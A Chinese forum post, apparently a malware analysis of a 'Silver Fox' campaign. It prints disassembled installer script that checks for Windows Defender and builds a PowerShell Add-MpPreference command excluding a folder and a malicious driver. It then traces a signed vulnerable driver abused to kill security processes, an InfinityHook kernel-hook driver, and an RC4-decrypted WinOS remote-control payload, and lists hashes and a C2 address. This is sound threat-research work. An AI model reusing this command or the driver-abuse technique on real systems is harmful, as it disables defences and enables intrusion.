pushvar Var9 ; StackCount = 11
call STRFROMCODE
pop ; StackCount = 10
pop ; StackCount = 9
add Var8, Var9
pop ; StackCount = 8
assign Var5, Var8
pop ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype Type30 ; StackCount = 9
pushtype S32 ; StackCount = 10
assign Var10, S32(11)
pushvar Var9 ; StackCount = 11
call SETARRAYLENGTH
pop ; StackCount = 10
pop ; StackCount = 9
assign Var9[0], S32(77)
assign Var9[1], S32(115)
assign Var9[2], S32(77)
assign Var9[3], S32(112)
assign Var9[4], S32(69)
assign Var9[5], S32(110)
assign Var9[6], S32(103)
assign Var9[7], S32(46)
assign Var9[8], S32(101)
assign Var9[9], S32(120)
assign Var9[10], S32(101)
assign Var8, Var9
pop ; StackCount = 8
pushvar Var6 ; StackCount = 9
call STRFROMCODE
pop ; StackCount = 8
pop ; StackCount = 7
pushtype WideString ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(40)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH
pop ; StackCount = 12
pop ; StackCount = 11
assign Var11[0], S32(83)
assign Var11[1], S32(69)
assign Var11[2], S32(76)
assign Var11[3], S32(69)
assign Var11[4], S32(67)
assign Var11[5], S32(84)
assign Var11[6], S32(32)
assign Var11[7], S32(42)
assign Var11[8], S32(32)
assign Var11[9], S32(70)
assign Var11[10], S32(82)
assign Var11[11], S32(79)
assign Var11[12], S32(77)
assign Var11[13], S32(32)
assign Var11[14], S32(87)
assign Var11[15], S32(105)
assign Var11[16], S32(110)
assign Var11[17], S32(51)
assign Var11[18], S32(50)
assign Var11[19], S32(95)
assign Var11[20], S32(80)
assign Var11[21], S32(114)
assign Var11[22], S32(111)
assign Var11[23], S32(99)
assign Var11[24], S32(101)
assign Var11[25], S32(115)
assign Var11[26], S32(115)
assign Var11[27], S32(32)
assign Var11[28], S32(87)
assign Var11[29], S32(72)
assign Var11[30], S32(69)
assign Var11[31], S32(82)
assign Var11[32], S32(69)
assign Var11[33], S32(32)
assign Var11[34], S32(78)
assign Var11[35], S32(97)
assign Var11[36], S32(109)
assign Var11[37], S32(101)
assign Var11[38], S32(61)
assign Var11[39], S32(34)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE
pop ; StackCount = 10
pop ; StackCount = 9
assign Var8, Var9
pop ; StackCount = 8
add Var8, Var6
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(1)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH
pop ; StackCount = 12
pop ; StackCount = 11
assign Var11[0], S32(34)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE
pop ; StackCount = 10
pop ; StackCount = 9
add Var8, Var9
pop ; StackCount = 8
assign Var7, Var8
pop ; StackCount = 7
pushtype IDISPATCH ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
assign Var9, Var4
pushvar Var8 ; StackCount = 10
call CREATEOLEOBJECT
pop ; StackCount = 9
pop ; StackCount = 8
assign Var1, Var8
pop ; StackCount = 7
pushtype !OPENARRAYOFVARIANT ; StackCount = 8
pushtype !OPENARRAYOFVARIANT ; StackCount = 9
pushtype S32 ; StackCount = 10
assign Var10, S32(2)
pushvar Var9 ; StackCount = 11
call SETARRAYLENGTH
pop ; StackCount = 10
pop ; StackCount = 9
assign Var9[0], String_3("")
assign Var9[1], Var5
assign Var8, Var9
pop ; StackCount = 8
pushtype String_3 ; StackCount = 9
assign Var9, String_3("ConnectServer")
pushtype BOOLEAN ; StackCount = 10
assign Var10, BOOLEAN(0)
pushtype IDISPATCH ; StackCount = 11
assign Var11, Var1
pushvar Var2 ; StackCount = 12
call IDISPATCHINVOKE
pop ; StackCount = 11
pop ; StackCount = 10
pop ; StackCount = 9
pop ; StackCount = 8
pop ; StackCount = 7
pushtype !OPENARRAYOFVARIANT ; StackCount = 8
pushtype !OPENARRAYOFVARIANT ; StackCount = 9
pushtype S32 ; StackCount = 10
assign Var10, S32(1)
pushvar Var9 ; StackCount = 11
call SETARRAYLENGTH
pop ; StackCount = 10
pop ; StackCount = 9
assign Var9[0], Var7
assign Var8, Var9
pop ; StackCount = 8
pushtype String_3 ; StackCount = 9
assign Var9, String_3("ExecQuery")
pushtype BOOLEAN ; StackCount = 10
assign Var10, BOOLEAN(0)
pushtype IDISPATCH ; StackCount = 11
assign Var11, Var2
pushvar Var3 ; StackCount = 12
call IDISPATCHINVOKE
pop ; StackCount = 11
pop ; StackCount = 10
pop ; StackCount = 9
pop ; StackCount = 8
pop ; StackCount = 7
pushtype Variant ; StackCount = 8
pushtype !OPENARRAYOFVARIANT ; StackCount = 9
pushtype !OPENARRAYOFVARIANT ; StackCount = 10
pushtype S32 ; StackCount = 11
assign Var11, S32(0)
pushvar Var10 ; StackCount = 12
call SETARRAYLENGTH
pop ; StackCount = 11
pop ; StackCount = 10
assign Var9, Var10
pop ; StackCount = 9
pushtype String_3 ; StackCount = 10
assign Var10, String_3("Count")
pushtype BOOLEAN ; StackCount = 11
assign Var11, BOOLEAN(0)
pushtype IDISPATCH ; StackCount = 12
assign Var12, Var3
pushvar Var8 ; StackCount = 13
call IDISPATCHINVOKE
pop ; StackCount = 12
pop ; StackCount = 11
pop ; StackCount = 10
pop ; StackCount = 9
pop ; StackCount = 8
gt RetVal, Var8, S32(0)
pop ; StackCount = 7
endtry
loc_b35:
assign RetVal, BOOLEAN(0)
endcatch
loc_b43:
ret以下是所有ASCII码数组的还原结果:
第一个数组(26字节)
第二个数组(4字节)
第三个数组(1字节)
第四个数组(5字节)
第五个数组(11字节)
第六个数组(40字节)
第七个数组(1字节)
这个函数通过WMI查询检查Windows Defender进程(MsMpEng.exe)是否在运行。它构建WQL查询语句:SELECT * FROM Win32_Process WHERE Name="MsMpEng.exe"
再看"ADDDEFENDEREXCLUSION"函数:
.function(export) void ADDDEFENDEREXCLUSION()
pushtype S32 ; StackCount = 1
pushtype UnicodeString_2 ; StackCount = 2
pushtype UnicodeString_2 ; StackCount = 3
pushtype UnicodeString_2 ; StackCount = 4
pushtype BOOLEAN ; StackCount = 5
pushvar Var5 ; StackCount = 6
call ISDEFENDERRUNNING
pop ; StackCount = 5
sfz Var5
pop ; StackCount = 4
jf loc_ead
pushtype Type30 ; StackCount = 5
pushtype Type30 ; StackCount = 6
pushtype S32 ; StackCount = 7
assign Var7, S32(14)
pushvar Var6 ; StackCount = 8
call SETARRAYLENGTH
pop ; StackCount = 7
pop ; StackCount = 6
assign Var6[0], S32(112)
assign Var6[1], S32(111)
assign Var6[2], S32(119)
assign Var6[3], S32(101)
assign Var6[4], S32(114)
assign Var6[5], S32(115)
assign Var6[6], S32(104)
assign Var6[7], S32(101)
assign Var6[8], S32(108)
assign Var6[9], S32(108)
assign Var6[10], S32(46)
assign Var6[11], S32(101)
assign Var6[12], S32(120)
assign Var6[13], S32(101)
assign Var5, Var6
pop ; StackCount = 5
pushvar Var2 ; StackCount = 6
call STRFROMCODE
pop ; StackCount = 5
pop ; StackCount = 4
pushtype Type30 ; StackCount = 5
pushtype Type30 ; StackCount = 6
pushtype S32 ; StackCount = 7
assign Var7, S32(8)
pushvar Var6 ; StackCount = 8
call SETARRAYLENGTH
pop ; StackCount = 7
pop ; StackCount = 6
assign Var6[0], S32(45)
assign Var6[1], S32(67)
assign Var6[2], S32(111)
assign Var6[3], S32(109)
assign Var6[4], S32(109)
assign Var6[5], S32(97)
assign Var6[6], S32(110)
assign Var6[7], S32(100)
assign Var5, Var6
pop ; StackCount = 5
pushvar Var3 ; StackCount = 6
call STRFROMCODE
pop ; StackCount = 5
pop ; StackCount = 4
pushtype Type30 ; StackCount = 5
pushtype Type30 ; StackCount = 6
pushtype S32 ; StackCount = 7
assign Var7, S32(1)
pushvar Var6 ; StackCount = 8
call SETARRAYLENGTH
pop ; StackCount = 7
pop ; StackCount = 6
assign Var6[0], S32(34)
assign Var5, Var6
pop ; StackCount = 5
pushvar Var4 ; StackCount = 6
call STRFROMCODE
pop ; StackCount = 5
pop ; StackCount = 4
pushtype WideString ; StackCount = 5
assign Var5, Var4
pushtype UnicodeString_2 ; StackCount = 6
pushtype Type30 ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype S32 ; StackCount = 9
assign Var9, S32(16)
pushvar Var8 ; StackCount = 10
call SETARRAYLENGTH
pop ; StackCount = 9
pop ; StackCount = 8
assign Var8[0], S32(65)
assign Var8[1], S32(100)
assign Var8[2], S32(100)
assign Var8[3], S32(45)
assign Var8[4], S32(77)
assign Var8[5], S32(112)
assign Var8[6], S32(80)
assign Var8[7], S32(114)
assign Var8[8], S32(101)
assign Var8[9], S32(102)
assign Var8[10], S32(101)
assign Var8[11], S32(114)
assign Var8[12], S32(101)
assign Var8[13], S32(110)
assign Var8[14], S32(99)
assign Var8[15], S32(101)
assign Var7, Var8
pop ; StackCount = 7
pushvar Var6 ; StackCount = 8
call STRFROMCODE
pop ; StackCount = 7
pop ; StackCount = 6
add Var5, Var6
pop ; StackCount = 5
assign Var4, Var5
pop ; StackCount = 4
pushtype WideString ; StackCount = 5
assign Var5, Var4
pushtype UnicodeString_2 ; StackCount = 6
pushtype Type30 ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype S32 ; StackCount = 9
assign Var9, S32(1)
pushvar Var8 ; StackCount = 10
call SETARRAYLENGTH
pop ; StackCount = 9
pop ; StackCount = 8
assign Var8[0], S32(32)
assign Var7, Var8
pop ; StackCount = 7
pushvar Var6 ; StackCount = 8
call STRFROMCODE
pop ; StackCount = 7
pop ; StackCount = 6
add Var5, Var6
pop ; StackCount = 5
assign Var4, Var5
pop ; StackCount = 4
pushtype WideString ; StackCount = 5
assign Var5, Var4
pushtype UnicodeString_2 ; StackCount = 6
pushtype Type30 ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype S32 ; StackCount = 9
assign Var9, S32(14)
pushvar Var8 ; StackCount = 10
call SETARRAYLENGTH
pop ; StackCount = 9
pop ; StackCount = 8
assign Var8[0], S32(45)
assign Var8[1], S32(69)
assign Var8[2], S32(120)
assign Var8[3], S32(99)
assign Var8[4], S32(108)
assign Var8[5], S32(117)
assign Var8[6], S32(115)
assign Var8[7], S32(105)
assign Var8[8], S32(111)
assign Var8[9], S32(110)
assign Var8[10], S32(80)
assign Var8[11], S32(97)
assign Var8[12], S32(116)
assign Var8[13], S32(104)
assign Var7, Var8
pop ; StackCount = 7
pushvar Var6 ; StackCount = 8
call STRFROMCODE
pop ; StackCount = 7
pop ; StackCount = 6
add Var5, Var6
pop ; StackCount = 5
assign Var4, Var5
pop ; StackCount = 4
pushtype WideString ; StackCount = 5
assign Var5, Var4
pushtype UnicodeString_2 ; StackCount = 6
pushtype Type30 ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype S32 ; StackCount = 9
assign Var9, S32(1)
pushvar Var8 ; StackCount = 10
call SETARRAYLENGTH
pop ; StackCount = 9
pop ; StackCount = 8
assign Var8[0], S32(32)
assign Var7, Var8
pop ; StackCount = 7
pushvar Var6 ; StackCount = 8
call STRFROMCODE
pop ; StackCount = 7
pop ; StackCount = 6
add Var5, Var6
pop ; StackCount = 5
assign Var4, Var5
pop ; StackCount = 4
pushtype WideString ; StackCount = 5
assign Var5, Var4
pushtype UnicodeString_2 ; StackCount = 6
pushtype Type30 ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype S32 ; StackCount = 9
assign Var9, S32(1)
pushvar Var8 ; StackCount = 10
call SETARRAYLENGTH
pop ; StackCount = 9
pop ; StackCount = 8
assign Var8[0], S32(39)
assign Var7, Var8
pop ; StackCount = 7
pushvar Var6 ; StackCount = 8
call STRFROMCODE
pop ; StackCount = 7
pop ; StackCount = 6
add Var5, Var6
pop ; StackCount = 5
pushtype UnicodeString_2 ; StackCount = 6
pushtype Type30 ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype S32 ; StackCount = 9
assign Var9, S32(25)
pushvar Var8 ; StackCount = 10
call SETARRAYLENGTH
pop ; StackCount = 9
pop ; StackCount = 8
assign Var8[0], S32(67)
assign Var8[1], S32(58)
assign Var8[2], S32(92)
assign Var8[3], S32(85)
assign Var8[4], S32(115)
assign Var8[5], S32(101)
assign Var8[6], S32(114)
assign Var8[7], S32(115)
assign Var8[8], S32(92)
assign Var8[9], S32(80)
assign Var8[10], S32(117)
assign Var8[11], S32(98)
assign Var8[12], S32(108)
assign Var8[13], S32(105)
assign Var8[14], S32(99)
assign Var8[15], S32(92)
assign Var8[16], S32(68)
assign Var8[17], S32(111)
assign Var8[18], S32(99)
assign Var8[19], S32(117)
assign Var8[20], S32(109)
assign Var8[21], S32(101)
assign Var8[22], S32(110)
assign Var8[23], S32(116)
assign Var8[24], S32(115)
assign Var7, Var8
pop ; StackCount = 7
pushvar Var6 ; StackCount = 8
call STRFROMCODE
pop ; StackCount = 7
pop ; StackCount = 6
add Var5, Var6
pop ; StackCount = 5
pushtype UnicodeString_2 ; StackCount = 6
pushtype Type30 ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype S32 ; StackCount = 9
assign Var9, S32(1)
pushvar Var8 ; StackCount = 10
call SETARRAYLENGTH
pop ; StackCount = 9
pop ; StackCount = 8
assign Var8[0], S32(39)
assign Var7, Var8
pop ; StackCount = 7
pushvar Var6 ; StackCount = 8
call STRFROMCODE
pop ; StackCount = 7
pop ; StackCount = 6
add Var5, Var6
pop ; StackCount = 5
pushtype UnicodeString_2 ; StackCount = 6
pushtype Type30 ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype S32 ; StackCount = 9
assign Var9, S32(1)
pushvar Var8 ; StackCount = 10
call SETARRAYLENGTH
pop ; StackCount = 9
pop ; StackCount = 8
assign Var8[0], S32(44)
assign Var7, Var8
pop ; StackCount = 7
pushvar Var6 ; StackCount = 8
call STRFROMCODE
pop ; StackCount = 7
pop ; StackCount = 6
add Var5, Var6
pop ; StackCount = 5
assign Var4, Var5
pop ; StackCount = 4
pushtype WideString ; StackCount = 5
assign Var5, Var4
pushtype UnicodeString_2 ; StackCount = 6
pushtype Type30 ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype S32 ; StackCount = 9
assign Var9, S32(1)
pushvar Var8 ; StackCount = 10
call SETARRAYLENGTH
pop ; StackCount = 9
pop ; StackCount = 8
assign Var8[0], S32(32)
assign Var7, Var8
pop ; StackCount = 7
pushvar Var6 ; StackCount = 8
call STRFROMCODE
pop ; StackCount = 7
pop ; StackCount = 6
add Var5, Var6
pop ; StackCount = 5
assign Var4, Var5
pop ; StackCount = 4
pushtype WideString ; StackCount = 5
assign Var5, Var4
pushtype UnicodeString_2 ; StackCount = 6
pushtype Type30 ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype S32 ; StackCount = 9
assign Var9, S32(1)
pushvar Var8 ; StackCount = 10
call SETARRAYLENGTH
pop ; StackCount = 9
pop ; StackCount = 8
assign Var8[0], S32(39)
assign Var7, Var8
pop ; StackCount = 7
pushvar Var6 ; StackCount = 8
call STRFROMCODE
pop ; StackCount = 7
pop ; StackCount = 6
add Var5, Var6
pop ; StackCount = 5
pushtype UnicodeString_2 ; StackCount = 6
pushtype Type30 ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype S32 ; StackCount = 9
assign Var9, S32(13)
pushvar Var8 ; StackCount = 10
call SETARRAYLENGTH
pop ; StackCount = 9
pop ; StackCount = 8
assign Var8[0], S32(67)
assign Var8[1], S32(58)
assign Var8[2], S32(92)
assign Var8[3], S32(67)
assign Var8[4], S32(110)
assign Var8[5], S32(100)
assign Var8[6], S32(111)
assign Var8[7], S32(109)
assign Var8[8], S32(54)
assign Var8[9], S32(46)
assign Var8[10], S32(115)
assign Var8[11], S32(121)
assign Var8[12], S32(115)
assign Var7, Var8
pop ; StackCount = 7
pushvar Var6 ; StackCount = 8
call STRFROMCODE
pop ; StackCount = 7
pop ; StackCount = 6
add Var5, Var6
pop ; StackCount = 5
pushtype UnicodeString_2 ; StackCount = 6
pushtype Type30 ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype S32 ; StackCount = 9
assign Var9, S32(1)
pushvar Var8 ; StackCount = 10
call SETARRAYLENGTH
pop ; StackCount = 9
pop ; StackCount = 8
assign Var8[0], S32(39)
assign Var7, Var8
pop ; StackCount = 7
pushvar Var6 ; StackCount = 8
call STRFROMCODE
pop ; StackCount = 7
pop ; StackCount = 6
add Var5, Var6
pop ; StackCount = 5
pushtype UnicodeString_2 ; StackCount = 6
pushtype Type30 ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype S32 ; StackCount = 9
assign Var9, S32(1)
pushvar Var8 ; StackCount = 10
call SETARRAYLENGTH
pop ; StackCount = 9
pop ; StackCount = 8
assign Var8[0], S32(34)
assign Var7, Var8
pop ; StackCount = 7
pushvar Var6 ; StackCount = 8
call STRFROMCODE
pop ; StackCount = 7
pop ; StackCount = 6
add Var5, Var6
pop ; StackCount = 5
assign Var4, Var5
pop ; StackCount = 4
pushtype BOOLEAN ; StackCount = 5
pushtype Pointer ; StackCount = 6
setptr Var6, Var1
pushtype U8_4 ; StackCount = 7
assign Var7, U8_4(1)
pushtype S32 ; StackCount = 8
assign Var8, S32(0)
pushtype UnicodeString_2 ; StackCount = 9
assign Var9, String_3("")
pushtype UnicodeString_2 ; StackCount = 10
pushtype WideString ; StackCount = 11
assign Var11, Var3
pushtype UnicodeString_2 ; StackCount = 12
pushtype Type30 ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype S32 ; StackCount = 15
assign Var15, S32(1)
pushvar Var14 ; StackCount = 16
call SETARRAYLENGTH
pop ; StackCount = 15
pop ; StackCount = 14
assign Var14[0], S32(32)
assign Var13, Var14
pop ; StackCount = 13
pushvar Var12 ; StackCount = 14
call STRFROMCODE
pop ; StackCount = 13
pop ; StackCount = 12
add Var11, Var12
pop ; StackCount = 11
add Var11, Var4
assign Var10, Var11
pop ; StackCount = 10
pushtype UnicodeString_2 ; StackCount = 11
assign Var11, Var2
pushvar Var5 ; StackCount = 12
call EXEC
pop ; StackCount = 11
pop ; StackCount = 10
pop ; StackCount = 9
pop ; StackCount = 8
pop ; StackCount = 7
pop ; StackCount = 6
pop ; StackCount = 5
pop ; StackCount = 4
pushtype S32 ; StackCount = 5
assign Var5, S32(4000)
call SLEEP
pop ; StackCount = 4
loc_ead:
ret以下是所有ASCII码数组的还原结果:
第一个数组(14字节)
第二个数组(8字节)
第三个数组(1字节)
第四个数组(16字节)
第五个数组(1字节)
第六个数组(14字节)
第七个数组(1字节)
第八个数组(1字节)
第九个数组(25字节)
第十个数组(1字节)
第十一个数组(1字节)
第十二个数组(1字节)
第十三个数组(1字节)
第十四个数组(13字节)
第十五个数组(1字节)
第十六个数组(1字节)
第十七个数组(1字节)
这个函数在Windows Defender运行时,向Windows Defender排除列表添加两个路径:C:\Users\Public\DocumentsC:\Cndom6.syspowershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents','C:\Cndom6.sys'"
B.) men.exe
SHA-256: 305a1c784db4e88267f1d35b914b6ce4702f2b1196c1cdf14c024d63d1d4871f
men.exe启动后会拉起C:\Users\Public\Documents\funzip.exe,如下图所示:
拉起的funzip.exe进程命令行为: C:\Users\Public\Documents\funzip.exe x "C:\Users\Public\Documents\x86-Microsoft-Windowsdata\tree.exe" -pServer8888 -o"C:\Users\Public\Documents\x86-Microsoft-Windowsdata" -y,即将tree.exe解压至x86-Microsoft-Windowsdata目录下,解压密码为"Server8888",如下图所示:
根据文件头信息 tree.exe实际为Zip加密压缩包,解压后可得到: KANG.exe Shell.log,如下图所示:
(根据文件头信息 Shell.log实际也为Zip加密压缩包,解压密码也为"Server8888",解压后可得到: StartMenuExperienceHostker.exe WUDFCompanionHoste.exe log.dll,我们将在下文中进行分析)
men.exe拉起funzip.exe解压加密Zip压缩包tree.exe,创建、释放KANG.exe,如下图所示:
随后men.exe会寻找判断KANG.exe是否已经启动,并不断拉起KANG.exe,如下图所示:
同时,观察到men.exe会尝试注入可读可执行内存至svchost.exe进程中,如下图所示:
随后,men.exe会释放并加载C:\Cndom6.sys驱动(SHA-256: 8c12407a40eab287a8281be64665b1e72b0e91b2daf84030a1a15dc280e5dbf1; 签名者: "Beijing Tianshui Technology Co., Ltd."),如下图所示:
该驱动使用InfinityHook技术实现系统内核API Hook,对于该驱动的分析将放在下文对于StartMenuExperienceHostker.exe的分析中。
C.) KANG.exe
SHA-256: 9ace6a1e4bee5834be38b4c2fd26780d1fcc18ea9d58224e31d6382c19e53296
首先我们在样本的主功能入口函数中看到,在Line 34-83,样本初始化v23这个列表,定义了25个后续需要终止的安全软件进程,主要包括:
随后,我们看到样本在Line 85从sub_14004BF20函数处获取到了一个设备句柄
如下图所示:
我们进入sub_14004BF20函数,发现该函数在Line 62处理来自&unk_140029490的35400字节的数据(驱动程序文件),在Line 64调用sub_14004C6D0函数加载驱动程序,如下图所示:
来自&unk_140029490的35400字节的数据(驱动程序文件),具有MZ头和PE头,确认为样本实际释放和加载的STProcessMonitor Driver驱动程序(SHA-256: 70bcec00c215fe52779700f74e9bd669ff836f594df92381cbfb7ee0568e7a8b),如下图所示:
本地实测,成功复现该加驱行为,如下图所示:
该驱动通过了WHQL认证,具有"Safetica Technologies s.r.o."与"Microsoft Windows Hardware Compatibility Publisher"颁发的数字签名,签名时间为2025年5月9日 11:43:46,相当新鲜,如下图所示:
sub_14004C6D0函数负责在注册表驱动/服务项中注册、加载驱动程序,相关注册表操作代码和字符串 如下图所示:
然后,我们回头来看KANG.exe给STProcessMonitor Driver的"\\.\STProcessMonitorDriver"设备发送的IOCTL 0xB822200C:
STProcessMonitor Driver驱动程序首先检查操作系统版本,如果系统是Windows 8(版本6.2)或更高版本,则设置特定的内存池类型和标志。
DriverObject->MajorFunction[2] = (PDRIVER_DISPATCH)&sub_140001A10;
DriverObject->MajorFunction[0] = (PDRIVER_DISPATCH)&sub_140001A10;
DriverObject->MajorFunction[14] = (PDRIVER_DISPATCH)&sub_140001B70;
DriverObject->DriverUnload = (PDRIVER_UNLOAD)sub_1400021F0;驱动程序设置了关键IRP(I/O请求包)的派遣函数:
因此,我们应进入sub_140001B70查看。
在sub_140001B70中,我们看到case 0xB822200C的主要操作为:打开进程/获取进程句柄=>结束进程=>关闭/释放进程句柄,其主要功能为终止、结束进程,如下图所示:
该驱动程序在没有经过目标验证的情况下,将结束进程功能的IOCTL暴露给用户模式,使攻击者能够终止内核模式中的任意进程。
">来自VirusTotal Relations的信息表明相关驱动至今仍有被分发的迹象,如下图所示:
本次使用的STProcessMonitor Driver在先前并未使用过。同时,鉴于该驱动在互联网、开源仓库、漏洞数据库中均未找到相关记录,且来自VirusTotal Relations的信息表明相关驱动至今仍有被分发的迹象,即相关驱动目前可能仍在被使用、分发,我们将其提交至CVE漏洞数据库并分配编号CVE-2025-70795。这表明该批银狐行为者可能会在真实世界中主动搜寻和挖掘全新的漏洞驱动。
将KANG.exe与STProcessMonitor Driver的IOCTL 0xB822200C控制码发送过程直观地合影留念,如下图所示:
SHA-256: cf111e28e40d20c9695e191c66b11882049c9559d5b4f2ed2090cf4626fdba39
用于启动WUDFCompanionHoste.exe
用于释放并加载C:\Cndom6.sys驱动,以使用InfinityHook技术实现系统内核API Hook
随后先调用sub_843220(th32ProcessID),通过SuspendThread(Win32 API)函数挂起其进程中的所有线程(下方还有错误处理未展示:如果线程挂起失败或原本已被挂起,则立即恢复线程原先状态,避免重复挂起),如下图所示:
然后再调用sub_8432F0(th32ProcessID),通过GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtResumeProcess")方式从ntdll.dll中动态获取NtResumeProcess(NT API)函数,如果成功则调用NtResumeProcess函数恢复其进程中的所有线程,之后再次尝试通过ResumeThread(Win32 API)函数恢复其进程中的所有线程,如下图所示:
完成上述步骤后,将WUDFCompanionHoste.exe文件路径赋给CmdLine,使用WinExec(CmdLine, 0)重新再次启动WUDFCompanionHoste.exe,如下图所示:
ii) 用于释放并加载C:\Cndom6.sys驱动,以使用InfinityHook技术实现系统内核API Hook
本地实测,成功复现该加驱行为,如下图所示:
随后,样本尝试向该驱动的设备发送IOCTL 0x222180控制码,如果失败再继续发送IOCTL 0x229390控制码,如下图所示:
我们接下来查看在Cndom6中,IOCTL 0x222180对应的功能,对Cndom6进行分析。
首先,进入DriverEntry,驱动程序调用IoCreateDevice创建一个名为"\Device\Cndom6"的设备对象,接着调用IoCreateSymbolicLink建立符号链接"\??\Cndom6",这样用户态应用程序就可以通过以上设备对象或链接名称访问该驱动设备。
DriverObject->MajorFunction[2] = (PDRIVER_DISPATCH)&sub_140003A9C;
DriverObject->MajorFunction[0] = (PDRIVER_DISPATCH)&sub_140003A9C;
DriverObject->MajorFunction[14] = (PDRIVER_DISPATCH)&sub_14000338C;驱动程序设置了关键IRP(I/O请求包)的派遣函数:
因此,我们应进入sub_14000338C查看。
在sub_14000338C中,我们看到case 0x222180的主要操作是将byte_140072AED标志位设置为1,如下图所示:
重新回头看该驱动具备的其他功能,从DriverEntry=>if ( sub_140001A10() )=>if ( ... && sub_14000202C() )中,发现该驱动通过调用sub_140004A3C函数获取NtTraceControl、KeQueryPerformanceCounter、NtQuerySystemInformation、NtOpenProcess、NtOpenThread等内核API地址,如下图所示:
同理,以NtOpenProcess为例,查找qword_140007340的交叉引用,找到针对NtOpenProcess API的Hook函数sub_140003F40,用于执行进程句柄保护,功能开关标志位为dword_140041D78,如下图所示:
触发Hook NtQuerySystemInformation、NtOpenProcess、 NtDuplicateObject API的调用器(启动器)函数sub_140001940,如下图所示:
** 同时,我们发现,样本完整运行后,StartMenuExperienceHostker.exe会被添加至计划任务启动项中,计划任务名称: "WindowsPowerShell.WbemScripting.WindowsData",如下图所示:
E.) WUDFCompanionHoste.exe=>log.dll
log.dll SHA-256: a14b681ec50328d3ac04f76ac18ef96fb7176425ff96325e2099ea57df3a1998
其会先读取Server.log文件,使用密钥"??Bid@locale@std"通过RC4解密,解密后执行WinOs远控模块,相关代码如下图所示:
WinOs远控模块执行后,连接远程服务器实现远控逻辑,后续长期驻留和进行信息窃取。”WinOS“远控上线配置如下:
三、附录
Ioc C2: uuuucome.com:5050 (解析IP: 8.210.25.225:5050) SHA-256:
查看全部评分
[复制链接]
来自 #
|
发表于 2026-2-12 16:09
|楼主
发表于 2026-2-11 22:17
分享到朋友圈
